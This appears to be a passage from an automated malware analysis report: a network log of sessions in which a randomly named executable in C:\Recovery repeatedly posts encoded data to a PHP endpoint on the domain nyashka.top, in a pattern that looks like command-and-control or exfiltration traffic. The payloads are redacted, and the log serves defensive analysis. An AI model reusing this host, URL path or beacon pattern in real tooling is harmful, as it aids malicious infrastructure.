                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:26.317755938 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:26.646017075 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:26.775768042 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
66 | 192.168.2.6 | 49793 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:26.923351049 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:27.279417992 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:27.587806940 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:27.719718933 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
67 | 192.168.2.6 | 49794 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:27.848227978 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:28.201327085 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:28.521579027 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:28.720983028 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
68 | 192.168.2.6 | 49795 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:29.147320032 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:29.498047113 CEST | 2516 | OUT | Data: [encoded payload]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
69 | 192.168.2.6 | 49796 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:29.739677906 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:30.091733932 CEST | 1840 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:30.425194979 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:30.562266111 CEST | 308 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 152
                                    Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
70 | 192.168.2.6 | 49797 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:29.866861105 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:30.216778994 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:30.563822031 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:30.703711033 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:30 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
71 | 192.168.2.6 | 49798 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:30.830689907 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
Aug 25, 2024 15:44:31.185538054 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:31.527590036 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:31.668103933 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
72 | 192.168.2.6 | 49799 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:31.798132896 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:32.156503916 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:32.472733021 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:32.603701115 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:31 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.6 | 49800 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:32.736696005 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:33.091747999 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:33.437525034 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:33.573899984 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:32 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.6 | 49801 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:33.713736057 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:34.061054945 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:34.378850937 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:34.506130934 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
75 | 192.168.2.6 | 49802 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:34.624799967 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:34.982395887 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:35.290450096 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:35.493910074 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:34 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
76 | 192.168.2.6 | 49803 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:35.585855961 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
77 | 192.168.2.6 | 49804 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:35.624265909 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
Aug 25, 2024 15:44:35.982466936 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:36.290426970 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:36.418219090 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:35 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
78 | 192.168.2.6 | 49805 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:36.546608925 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
Aug 25, 2024 15:44:36.913373947 CEST | 2516 | OUT | Data: [encoded payload]
Aug 25, 2024 15:44:37.247601986 CEST | 25 | IN | HTTP/1.1 100 Continue
Aug 25, 2024 15:44:37.379519939 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
79 | 192.168.2.6 | 49806 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
Timestamp | Bytes transferred | Direction | Data
Aug 25, 2024 15:44:37.506937027 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:37.857589960 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:38.172514915 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:38.374134064 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    80 | 192.168.2.6 | 49807 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:38.508047104 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:38.857403040 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:39.177469015 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:39.378660917 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:38 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    81 | 192.168.2.6 | 49808 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:39.627537966 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:39.982346058 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:40.302073002 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:40.431818962 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    82 | 192.168.2.6 | 49809 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:40.653474092 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1820
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:40.998276949 CEST | 1820 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:41.350316048 CEST | 25 | IN | HTTP/1.1 100 Continue


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    83 | 192.168.2.6 | 49810 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:40.667280912 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:41.013622046 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:41.352663040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:41.481997967 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    84 | 192.168.2.6 | 49811 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:41.626873016 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:41.996226072 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:42.298043966 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:42.505667925 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    85 | 192.168.2.6 | 49813 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:42.630007982 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:42.982507944 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:43.301285028 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:43.435637951 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    86 | 192.168.2.6 | 49814 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:43.562948942 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:43.919903040 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:44.248076916 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:44.461978912 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    87 | 192.168.2.6 | 49815 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:44.655134916 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:45.013719082 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:45.339394093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:45.466134071 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    88 | 192.168.2.6 | 49816 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:45.596263885 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:45.951143026 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:46.268445969 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:46.472846031 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    89 | 192.168.2.6 | 49817 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:46.551513910 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 1840
                                    Expect: 100-continue
                                    Connection: Keep-Alive


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    90 | 192.168.2.6 | 49818 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:46.593861103 CEST | 293 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2516
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Aug 25, 2024 15:44:46.951167107 CEST | 2516 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:47.261003017 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:47.459873915 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:46 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    91 | 192.168.2.6 | 49819 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Aug 25, 2024 15:44:47.688256025 CEST | 269 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                    Host: 373292cm.nyashka.top
                                    Content-Length: 2512
                                    Expect: 100-continue
                                    Aug 25, 2024 15:44:48.044972897 CEST | 2512 | OUT | Data (raw bytes)
                                    Aug 25, 2024 15:44:48.381426096 CEST | 25 | IN | HTTP/1.1 100 Continue
                                    Aug 25, 2024 15:44:48.515692949 CEST | 158 | IN | HTTP/1.1 200 OK
                                    Server: nginx
                                    Date: Sun, 25 Aug 2024 13:44:47 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 4
                                    Connection: keep-alive
                                    Data Raw: 3b 55 5f 5b
                                    Data Ascii: ;U_[


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    92 | 192.168.2.6 | 49820 | 80.211.144.156 | 80 | 6244 | C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Timestamp | Bytes transferred | Direction | Data
